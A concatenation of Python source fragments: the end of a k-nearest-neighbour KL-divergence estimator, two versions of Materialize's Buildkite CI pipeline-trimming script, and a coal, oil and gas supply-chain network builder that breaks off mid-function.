    References
    ----------
    Kullback-Leibler Divergence Estimation of Continuous Distributions (2008).
    Fernando Pérez-Cruz.
    """
    # mk: whether the caller asked for several k values (and hence a list back).
    mk = np.iterable(k)
    ka = np.atleast_1d(k)
    nx, d = x.shape
    ny, d = y.shape
    # Limit the number of dimensions to 10, too slow otherwise.
    if d > 10:
        raise ValueError("Too many dimensions: {}.".format(d))
    # Not enough data to draw conclusions.
    if nx < 5 or ny < 5:
        return np.nan if not mk else [np.nan] * len(k)
    # Build a KD tree representation of the samples.
    xtree = KDTree(x)
    ytree = KDTree(y)
    # Get the k'th nearest neighbour from each points in x for both x and y.
    # We get the values for K + 1 to make sure the output is a 2D array.
    kmax = max(ka) + 1
    r, _ = xtree.query(x, k=kmax, eps=0, p=2, workers=2)
    s, _ = ytree.query(x, k=kmax, eps=0, p=2, workers=2)
    # There is a mistake in the paper. In Eq. 14, the right side misses a
    # negative sign on the first term of the right hand side.
    out = list()
    for ki in ka:
        # The 0th nearest neighbour of x[i] in x is x[i] itself.
        # Hence we take the k'th + 1, which in 0-based indexing is given by
        # index k. For distances in y there is no self-match, so index ki - 1.
        out.append(
            -np.log(r[:, ki] / s[:, ki - 1]).sum() * d / nx + np.log(ny / (nx - 1.0))
        )
    if mk:
        return out
    return out[0]
|
# Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
"""Generator for the test CI pipeline.
This script takes pipeline.template.yml as input, possibly trims out jobs
whose inputs have not changed relative to the code on main, and uploads the
resulting pipeline to the Buildkite job that triggers this script.
On main and tags, all jobs are always run.
For details about how steps are trimmed, see the comment at the top of
pipeline.template.yml and the docstring on `trim_pipeline` below.
"""
import copy
import os
import subprocess
import sys
from collections import OrderedDict
from pathlib import Path
from typing import Any, Iterable, Set
import yaml
from materialize import mzbuild, mzcompose, spawn
from ..deploy.deploy_util import environmentd_rust_version
# These paths contain "CI glue code", i.e., the code that powers CI itself,
# including this very script! All of CI implicitly depends on this code, so
# whenever it changes, we ought not trim any jobs from the pipeline in order to
# exercise as much of the glue code as possible.
#
# It's tough to track this code with any sort of fine-grained granularity, so we
# err on the side of including too much rather than too little. (For example,
# bin/resync-submodules is not presently used by CI, but it's just not worth
# trying to capture that.)
CI_GLUE_GLOBS = ["bin", "ci", "misc/python"]
def main() -> int:
    """Render pipeline.template.yml, trim unchanged steps, and upload the result.

    Returns
    -------
    int
        Process exit code (always 0; failures raise instead).
    """
    # Make sure we have an up to date view of main.
    spawn.runv(["git", "fetch", "origin", "main"])
    # Print out a summary of all changes.
    os.environ["GIT_PAGER"] = ""
    spawn.runv(["git", "diff", "--stat", "origin/main..."])
    with open(Path(__file__).parent / "pipeline.template.yml") as f:
        raw = f.read()
    # Substitute the Rust toolchain version placeholder before parsing the YAML.
    raw = raw.replace("$ENVIRONMENTD_RUST_VERSION", environmentd_rust_version())
    pipeline = yaml.safe_load(raw)
    # NOTE(review): assumes BUILDKITE_BRANCH and BUILDKITE_TAG are set (they are
    # inside Buildkite jobs); a KeyError here means we are not running under CI.
    if os.environ["BUILDKITE_BRANCH"] == "main" or os.environ["BUILDKITE_TAG"]:
        print("On main branch or tag, so not trimming pipeline")
    elif have_paths_changed(CI_GLUE_GLOBS):
        # We still execute pipeline trimming on a copy of the pipeline to
        # protect against bugs in the pipeline trimming itself.
        print("--- [DRY RUN] Trimming unchanged steps from pipeline")
        print(
            "Repository glue code has changed, so the trimmed pipeline below does not apply"
        )
        trim_pipeline(copy.deepcopy(pipeline))
    else:
        print("--- Trimming unchanged steps from pipeline")
        trim_pipeline(pipeline)
    # Upload a dummy JUnit report so that the "Analyze tests" step doesn't fail
    # if we trim away all the JUnit report-generating steps.
    Path("junit-dummy.xml").write_text("")
    spawn.runv(["buildkite-agent", "artifact", "upload", "junit-dummy.xml"])
    # Remove the Materialize-specific keys from the configuration that are
    # only used to inform how to trim the pipeline.
    for step in pipeline["steps"]:
        if "inputs" in step:
            del step["inputs"]
    spawn.runv(
        ["buildkite-agent", "pipeline", "upload"], stdin=yaml.dump(pipeline).encode()
    )
    return 0
class PipelineStep:
    """A pipeline step together with the inputs that determine whether it runs."""

    def __init__(self, id: str):
        self.id = id
        # Globs declared explicitly via the step's `inputs` key.
        self.extra_inputs: Set[str] = set()
        # mzbuild images the step depends on (discovered via the mzcompose plugin).
        self.image_dependencies: Set[mzbuild.ResolvedImage] = set()
        # IDs of other steps this step depends on.
        self.step_dependencies: Set[str] = set()

    def inputs(self) -> Set[str]:
        """Return all input globs that, when changed, require rerunning this step."""
        paths = set(self.extra_inputs)
        for image in self.image_dependencies:
            paths |= image.inputs(transitive=True)
        return paths
def trim_pipeline(pipeline: Any) -> None:
    """Trim pipeline steps whose inputs have not changed in this branch.

    Steps are assigned inputs in two ways:

    1. An explicit glob in the `inputs` key.
    2. An implicit dependency on any number of mzbuild images via the
       mzcompose plugin. Any steps which use the mzcompose plugin will
       have inputs autodiscovered based on the images used in that
       mzcompose configuration.

    A step is trimmed if a) none of its inputs have changed, and b) there are
    no other untrimmed steps that depend on it.
    """
    repo = mzbuild.Repository(Path("."))

    # Build a PipelineStep per step, collecting explicit inputs, step
    # dependencies, and mzcompose image dependencies.
    steps = OrderedDict()
    for config in pipeline["steps"]:
        if "wait" in config:
            continue
        step = PipelineStep(config["id"])
        if "inputs" in config:
            for inp in config["inputs"]:
                step.extra_inputs.add(inp)
        if "depends_on" in config:
            d = config["depends_on"]
            if isinstance(d, str):
                step.step_dependencies.add(d)
            elif isinstance(d, list):
                step.step_dependencies.update(d)
            else:
                raise ValueError(f"unexpected non-str non-list for depends_on: {d}")
        if "plugins" in config:
            for plugin in config["plugins"]:
                for plugin_name, plugin_config in plugin.items():
                    if plugin_name == "./ci/plugins/mzcompose":
                        name = plugin_config["composition"]
                        composition = mzcompose.Composition(repo, name)
                        for dep in composition.dependencies:
                            step.image_dependencies.add(dep)
                        step.extra_inputs.add(str(repo.compositions[name]))
        steps[step.id] = step

    # Find all the steps whose inputs have changed with respect to main.
    # We delegate this hard work to Git.
    changed = set()
    for step in steps.values():
        inputs = step.inputs()
        if not inputs:
            # No inputs means there is no way this step can be considered
            # changed, but `git diff` with no pathspecs means "diff everything",
            # not "diff nothing", so explicitly skip.
            continue
        if have_paths_changed(inputs):
            changed.add(step.id)

    # Then collect all changed steps, and all the steps that those changed steps
    # depend on.
    needed = set()

    def visit(step: PipelineStep) -> None:
        if step.id not in needed:
            needed.add(step.id)
            for d in step.step_dependencies:
                visit(steps[d])

    for step_id in changed:
        visit(steps[step_id])

    # Print decisions, for debugging. Keep the inner quotes in the f-string
    # distinct from the outer ones: reusing the same quote character inside an
    # f-string is a SyntaxError before Python 3.12 (PEP 701).
    for step in steps.values():
        print(f"{'✓' if step.id in needed else '✗'} {step.id}")
        if step.step_dependencies:
            print(" wait:", " ".join(step.step_dependencies))
        if step.extra_inputs:
            print(" globs:", " ".join(step.extra_inputs))
        if step.image_dependencies:
            print(
                " images:", " ".join(image.name for image in step.image_dependencies)
            )

    # Restrict the pipeline to the needed steps.
    pipeline["steps"] = [
        step for step in pipeline["steps"] if "wait" in step or step["id"] in needed
    ]
def have_paths_changed(globs: Iterable[str]) -> bool:
    """Reports whether the specified globs have diverged from origin/main."""
    # `git diff --quiet` exits 0 when nothing under the pathspecs differs
    # and 1 when something does; any other exit code is a real git failure.
    cmd = ["git", "diff", "--no-patch", "--quiet", "origin/main...", "--"]
    cmd.extend(globs)
    result = subprocess.run(cmd)
    if result.returncode in (0, 1):
        return result.returncode == 1
    # Surface unexpected failures as CalledProcessError with full context.
    result.check_returncode()
    raise RuntimeError("unreachable")
# Script entry point: propagate main()'s return code as the exit status.
if __name__ == "__main__":
    sys.exit(main())
| # Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
"""Generator for the test CI pipeline.
This script takes pipeline.template.yml as input, possibly trims out jobs
whose inputs have not changed relative to the code on main, and uploads the
resulting pipeline to the Buildkite job that triggers this script.
On main and tags, all jobs are always run.
For details about how steps are trimmed, see the comment at the top of
pipeline.template.yml and the docstring on `trim_pipeline` below.
"""
import copy
import os
import subprocess
import sys
from collections import OrderedDict
from pathlib import Path
from typing import Any, Iterable, Set
import yaml
from materialize import mzbuild, mzcompose, spawn
from ..deploy.deploy_util import environmentd_rust_version
# These paths contain "CI glue code", i.e., the code that powers CI itself,
# including this very script! All of CI implicitly depends on this code, so
# whenever it changes, we ought not trim any jobs from the pipeline in order to
# exercise as much of the glue code as possible.
#
# It's tough to track this code with any sort of fine-grained granularity, so we
# err on the side of including too much rather than too little. (For example,
# bin/resync-submodules is not presently used by CI, but it's just not worth
# trying to capture that.)
CI_GLUE_GLOBS = ["bin", "ci", "misc/python"]
def main() -> int:
    """Render pipeline.template.yml, optionally trim it, and upload it.

    Returns 0 on success; all failures surface as exceptions from the
    invoked subcommands.
    """
    # Make sure we have an up to date view of main.
    spawn.runv(["git", "fetch", "origin", "main"])
    # Print out a summary of all changes.
    os.environ["GIT_PAGER"] = ""
    spawn.runv(["git", "diff", "--stat", "origin/main..."])
    # Substitute the Rust toolchain version into the template before parsing.
    with open(Path(__file__).parent / "pipeline.template.yml") as f:
        raw = f.read()
    raw = raw.replace("$ENVIRONMENTD_RUST_VERSION", environmentd_rust_version())
    pipeline = yaml.safe_load(raw)
    if os.environ["BUILDKITE_BRANCH"] == "main" or os.environ["BUILDKITE_TAG"]:
        print("On main branch or tag, so not trimming pipeline")
    elif have_paths_changed(CI_GLUE_GLOBS):
        # We still execute pipeline trimming on a copy of the pipeline to
        # protect against bugs in the pipeline trimming itself.
        print("--- [DRY RUN] Trimming unchanged steps from pipeline")
        print(
            "Repository glue code has changed, so the trimmed pipeline below does not apply"
        )
        trim_pipeline(copy.deepcopy(pipeline))
    else:
        print("--- Trimming unchanged steps from pipeline")
        trim_pipeline(pipeline)
    # Upload a dummy JUnit report so that the "Analyze tests" step doesn't fail
    # if we trim away all the JUnit report-generating steps.
    Path("junit-dummy.xml").write_text("")
    spawn.runv(["buildkite-agent", "artifact", "upload", "junit-dummy.xml"])
    # Remove the Materialize-specific keys from the configuration that are
    # only used to inform how to trim the pipeline.
    for step in pipeline["steps"]:
        if "inputs" in step:
            del step["inputs"]
    # Hand the final YAML to Buildkite via stdin.
    spawn.runv(
        ["buildkite-agent", "pipeline", "upload"], stdin=yaml.dump(pipeline).encode()
    )
    return 0
class PipelineStep:
    """A Buildkite step plus the metadata needed to decide whether to trim it."""

    def __init__(self, id: str):
        self.id = id
        # Explicit input globs from the step's `inputs` key.
        self.extra_inputs: Set[str] = set()
        # mzbuild images discovered via the mzcompose plugin.
        self.image_dependencies: Set[mzbuild.ResolvedImage] = set()
        # Ids of other steps this step depends on.
        self.step_dependencies: Set[str] = set()

    def inputs(self) -> Set[str]:
        """Return every input path for this step, explicit and discovered."""
        combined = set(self.extra_inputs)
        for image in self.image_dependencies:
            combined.update(image.inputs(transitive=True))
        return combined
def trim_pipeline(pipeline: Any) -> None:
    """Trim pipeline steps whose inputs have not changed in this branch.

    Steps are assigned inputs in two ways:

    1. An explicit glob in the `inputs` key.
    2. An implicit dependency on any number of mzbuild images via the
       mzcompose plugin. Any steps which use the mzcompose plugin will
       have inputs autodiscovered based on the images used in that
       mzcompose configuration.

    A step is trimmed if a) none of its inputs have changed, and b) there are
    no other untrimmed steps that depend on it.
    """
    repo = mzbuild.Repository(Path("."))
    # Index each non-wait step by id, collecting explicit input globs,
    # step dependencies, and mzcompose-discovered image dependencies.
    steps = OrderedDict()
    for config in pipeline["steps"]:
        if "wait" in config:
            continue
        step = PipelineStep(config["id"])
        if "inputs" in config:
            for inp in config["inputs"]:
                step.extra_inputs.add(inp)
        if "depends_on" in config:
            d = config["depends_on"]
            if isinstance(d, str):
                step.step_dependencies.add(d)
            elif isinstance(d, list):
                step.step_dependencies.update(d)
            else:
                raise ValueError(f"unexpected non-str non-list for depends_on: {d}")
        if "plugins" in config:
            for plugin in config["plugins"]:
                for plugin_name, plugin_config in plugin.items():
                    if plugin_name == "./ci/plugins/mzcompose":
                        name = plugin_config["composition"]
                        composition = mzcompose.Composition(repo, name)
                        for dep in composition.dependencies:
                            step.image_dependencies.add(dep)
                        # The composition file itself is also an input.
                        step.extra_inputs.add(str(repo.compositions[name]))
        steps[step.id] = step
    # Find all the steps whose inputs have changed with respect to main.
    # We delegate this hard work to Git.
    changed = set()
    for step in steps.values():
        inputs = step.inputs()
        if not inputs:
            # No inputs means there is no way this step can be considered
            # changed, but `git diff` with no pathspecs means "diff everything",
            # not "diff nothing", so explicitly skip.
            continue
        if have_paths_changed(inputs):
            changed.add(step.id)
    # Then collect all changed steps, and all the steps that those changed steps
    # depend on.
    needed = set()
    def visit(step: PipelineStep) -> None:
        # Depth-first walk; `needed` doubles as the visited set, so each
        # step is expanded at most once.
        if step.id not in needed:
            needed.add(step.id)
            for d in step.step_dependencies:
                visit(steps[d])
    for step_id in changed:
        visit(steps[step_id])
    # Print decisions, for debugging.
    for step in steps.values():
        print(f'{"✓" if step.id in needed else "✗"} {step.id}')
        if step.step_dependencies:
            print(" wait:", " ".join(step.step_dependencies))
        if step.extra_inputs:
            print(" globs:", " ".join(step.extra_inputs))
        if step.image_dependencies:
            print(
                " images:", " ".join(image.name for image in step.image_dependencies)
            )
    # Restrict the pipeline to the needed steps; wait steps are always kept.
    pipeline["steps"] = [
        step for step in pipeline["steps"] if "wait" in step or step["id"] in needed
    ]
def have_paths_changed(globs: Iterable[str]) -> bool:
    """Reports whether the specified globs have diverged from origin/main."""
    # `git diff --quiet` exits 0 when nothing under the pathspecs differs
    # and 1 when something does; any other exit code is a real git failure.
    diff = subprocess.run(
        ["git", "diff", "--no-patch", "--quiet", "origin/main...", "--", *globs]
    )
    if diff.returncode == 0:
        return False
    elif diff.returncode == 1:
        return True
    else:
        # Re-raise the unexpected failure as CalledProcessError.
        diff.check_returncode()
        raise RuntimeError("unreachable")
# Script entry point: propagate main()'s return code as the exit status.
if __name__ == "__main__":
    sys.exit(main())
|
import logging, json, os, sys
# Log to stdout at INFO so progress is visible when run in a pipeline.
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
import pandas as pd
from tqdm import tqdm
# Register tqdm's pandas integration (enables progress_apply).
tqdm.pandas()
# Per-fuel edge-assembly step lists consumed by the make_*_network functions;
# each step carries 'name', 'dup_1', 'dup_2' and 'reverse' keys.
from ffsc.flow.recipes import recipes
def get_edges(df, dup_1, dup_2, reverse):
    """Extract (start, end, impedance) tuples from an edge DataFrame.

    dup_1/dup_2 select the duplicated ('_B') start/end node columns, and
    reverse swaps edge direction before extraction.
    """
    start_col = 'START_B' if dup_1 else 'START'
    end_col = 'END_B' if dup_2 else 'END'
    ordered = [end_col, start_col] if reverse else [start_col, end_col]
    return df[ordered + ['IMPEDANCE']].to_records(index=False).tolist()
def make_coal_network(
    df_cities,
    df_powerstations,
    df_coalmines,
    df_edges_cities,
    df_edges_powerstations,
    df_edges_coalmines,
    df_edges_other_railways,
    df_edges_railways_other,
    df_edges_shippingroutes_other,
    df_edges_railways_railways,
    df_edges_shippingroutes_shippingroutes, flow_parameters):
    """Build the coal supply-chain edge list.

    Trims out non-coal power stations, prices each edge type from
    ``flow_parameters`` (per-km transport cost, plus half a load/unload
    cost where applicable, scaled by tonnes-per-TJ of coal), then
    assembles the edges prescribed by ``recipes['coal']``.

    Returns a pandas DataFrame with columns START, END, IMPEDANCE.
    """
    logger = logging.getLogger('flow_edges_coal')
    # Debug: preview every input frame.
    for df in [df_cities,
               df_powerstations,
               df_coalmines,
               df_edges_cities,
               df_edges_powerstations,
               df_edges_coalmines,
               df_edges_other_railways,
               df_edges_railways_other,
               df_edges_shippingroutes_other,
               df_edges_railways_railways,
               df_edges_shippingroutes_shippingroutes]:
        print (df.head(5))
    edge_dfs = [df_edges_cities,
                df_edges_powerstations,
                df_edges_coalmines,
                df_edges_other_railways,
                df_edges_railways_other,
                df_edges_shippingroutes_other,
                df_edges_railways_railways,
                df_edges_shippingroutes_shippingroutes]
    # Fix: removed the stray 'df_edges_other_shippingroutes' entry so names
    # zip 1:1 with edge_dfs; previously the last frames were logged under
    # the wrong labels.
    names = ['df_edges_cities',
             'df_edges_powerstations',
             'df_edges_coalmines',
             'df_edges_other_railways',
             'df_edges_railways_other',
             'df_edges_shippingroutes_other',
             'df_edges_railways_railways',
             'df_edges_shippingroutes_shippingroutes']
    for df, name in zip(edge_dfs, names):
        # Double quotes inside the f-string keep this parseable on Python < 3.12.
        logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
    ## trim for coal
    logger.info('Trimming for coal')
    # Drop power stations whose primary fuel is not coal, plus any edges
    # that point at them; also drop shipping edges to LNG/shipping nodes.
    powerstations_noncoal = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Coal'),'unique_id'].values
    df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_noncoal)]
    df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
    df_edges_railways_other = df_edges_railways_other[~df_edges_railways_other['END'].isin(powerstations_noncoal)]
    df_edges_shippingroutes_other = df_edges_shippingroutes_other[~df_edges_shippingroutes_other['END'].str.split('_').str[0].isin(['LNGTERMINAL','SHIPPINGROUTE'])]
    ### get ingredients
    df_ingredients = {
        'coalmines-railways':df_edges_other_railways.copy(),
        'coalmines-firstmile':df_edges_coalmines.copy(),
        'railways-railways':df_edges_railways_railways.copy(),
        'railways-ports':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
        'railways-powerstations':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
        'railways-cities':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='CITY'].copy(),
        'lastmile-powerstations': df_edges_powerstations.copy(),
        'cities-lastmile':df_edges_cities.copy()
    }
    ### add impedances: distance-proportional cost (+ half a load/unload
    ### cost at network boundaries), scaled by tonnes-per-TJ of coal.
    logger.info('Adding impedances')
    df_ingredients['coalmines-railways']['IMPEDANCE']= (df_ingredients['coalmines-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['coalmines-firstmile']['IMPEDANCE']=(df_ingredients['coalmines-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-railways']['IMPEDANCE']=(df_ingredients['railways-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'])*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-ports']['IMPEDANCE']=(df_ingredients['railways-ports']['DISTANCE']/1000*flow_parameters['RAILCOST']+ flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['shipping-ports']['IMPEDANCE']=(df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['shipping-shipping']['IMPEDANCE']=(df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-powerstations']['IMPEDANCE']=(df_ingredients['railways-powerstations']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-cities']['IMPEDANCE']=(df_ingredients['railways-cities']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['lastmile-powerstations']['IMPEDANCE']=(df_ingredients['lastmile-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['cities-lastmile']['IMPEDANCE']=(df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['coal']
    # Add duplicated ('_B') node columns where the recipe requires them.
    for step in recipes['coal']:
        if step['dup_1']==True:
            df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
        if step['dup_2']==True:
            df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
    ### assemble
    logger.info('assembling edge dataframe')
    all_edges = []
    for step in recipes['coal']:
        all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
    print (len(all_edges))
    return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_oil_network(
    df_cities,
    df_powerstations,
    df_oilfields,
    df_oilwells,
    df_edges_cities,
    df_edges_powerstations,
    df_edges_oilfields,
    df_edges_oilwells,
    df_edges_other_pipelines,
    df_edges_pipelines_other,
    df_edges_pipelines_pipelines,
    df_edges_shippingroutes_other,
    df_edges_shippingroutes_shippingroutes,
    flow_parameters):
    """Build the oil supply-chain edge list.

    Trims out non-oil power stations and LNG terminal edges, prices each
    edge type from ``flow_parameters`` (per-km cost, plus half a
    load/unload cost for sea legs, scaled by tonnes-per-TJ of oil), then
    assembles the edges prescribed by ``recipes['oil']``.

    Returns a pandas DataFrame with columns START, END, IMPEDANCE.
    """
    logger = logging.getLogger('flow_edges_oil')
    edge_dfs = [df_edges_cities,
                df_edges_powerstations,
                df_edges_oilfields,
                df_edges_oilwells,
                df_edges_other_pipelines,
                df_edges_pipelines_other,
                df_edges_pipelines_pipelines,
                df_edges_shippingroutes_other,
                df_edges_shippingroutes_shippingroutes]
    names = ['df_edges_cities',
             'df_edges_powerstations',
             'df_edges_oilfields',
             'df_edges_oilwells',
             'df_edges_other_pipelines',
             'df_edges_pipelines_other',
             'df_edges_pipelines_pipelines',
             'df_edges_shippingroutes_other',
             'df_edges_shippingroutes_shippingroutes']
    for df, name in zip(edge_dfs, names):
        # Double quotes inside the f-string keep this parseable on Python < 3.12.
        logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
    ## trim for oil
    logger.info('Trimming for oil')
    print ('step 1')
    print (df_edges_powerstations)
    # Drop power stations whose primary fuel is not oil, plus any edges
    # that point at them; also drop edges into LNG terminals.
    powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Oil'),'unique_id'].values
    df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
    print ('step 2')
    print (df_edges_powerstations)
    df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
    print ('step 3')
    print (df_edges_powerstations)
    df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
    df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
    df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
    ### get ingredients
    df_ingredients = {
        'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
        'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
        'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
        'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
        'pipelines-ports':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
        'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
        'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
        'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
        'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
        'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
        'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
        'cities-lastmile':df_edges_cities.copy()
    }
    ### add impedances: distance-proportional cost (+ half a load cost for
    ### sea legs), scaled by tonnes-per-TJ of oil.
    logger.info('Adding impedances')
    df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-ports']['IMPEDANCE'] = (df_ingredients['pipelines-ports']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['shipping-ports']['IMPEDANCE'] = (df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
    df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    # Add duplicated ('_B') node columns where the recipe requires them.
    for step in recipes['oil']:
        if step['dup_1']==True:
            df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
        if step['dup_2']==True:
            df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
    ### assemble
    logger.info('assembling edge dataframe')
    all_edges = []
    for step in recipes['oil']:
        all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
    print (len(all_edges))
    return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_gas_network(
    df_cities,
    df_powerstations,
    df_oilfields,
    df_oilwells,
    df_edges_cities,
    df_edges_powerstations,
    df_edges_oilfields,
    df_edges_oilwells,
    df_edges_other_pipelines,
    df_edges_pipelines_other,
    df_edges_pipelines_pipelines,
    df_edges_shippingroutes_other,
    df_edges_shippingroutes_shippingroutes,
    flow_parameters):
    """Build the gas supply-chain edge list.

    Trims out non-gas power stations and port edges (gas ships via LNG
    terminals instead of ports), prices each edge type from
    ``flow_parameters``, and assembles the edges prescribed by
    ``recipes['gas']`` into a START/END/IMPEDANCE DataFrame.
    """
    logger = logging.getLogger('flow_edges_Gas')
    edge_dfs = [df_edges_cities,
                df_edges_powerstations,
                df_edges_oilfields,
                df_edges_oilwells,
                df_edges_other_pipelines,
                df_edges_pipelines_other,
                df_edges_pipelines_pipelines,
                df_edges_shippingroutes_other,
                df_edges_shippingroutes_shippingroutes]
    names = ['df_edges_cities',
             'df_edges_powerstations',
             'df_edges_oilfields',
             'df_edges_oilwells',
             'df_edges_other_pipelines',
             'df_edges_pipelines_other',
             'df_edges_pipelines_pipelines',
             'df_edges_shippingroutes_other',
